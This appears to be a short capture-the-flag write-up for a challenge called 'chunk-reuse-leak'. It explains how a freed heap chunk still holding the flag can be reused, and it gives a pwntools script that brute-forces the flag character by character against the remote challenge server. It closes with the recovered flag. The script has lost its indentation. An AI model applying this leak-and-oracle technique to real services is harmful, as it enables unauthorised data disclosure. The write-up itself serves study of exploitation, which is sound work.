Solution:
"chunk-reuse-leak"
fgets creates a chunk of the heap containing the flag as part of `read_flag`. so the next time we use malloc, it's possible to re-use that chunk and then intelligently clobber the existing flag to get a character by character leak.

```
import string
import pwn
import time
import warnings

warnings.filterwarnings(action='ignore', category=BytesWarning)

elf = pwn.ELF("./chal")
pwn.context.binary = elf
# pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])

libc = elf.libc
# p = elf.process()
# p = pwn.remote("0.cloud.chals.io", 25330)

# Start
flag = "TBTL{"

while flag[-1] != "}":
for c in string.ascii_letters + string.digits + "_}":
p = pwn.remote("0.cloud.chals.io", 25330)

guess = flag + c
print(guess)

p.sendlineafter(b"guess:", "64")
p.sendlineafter("guess", guess)

response = p.recvall().decode()
if "Almost" in response:
flag += c
print(flag)
break

p.close()
print(flag)
time.sleep(2)

# TBTL{50m371m35_y0u_d0_1nd33d_937_1ucky_4321092833}
```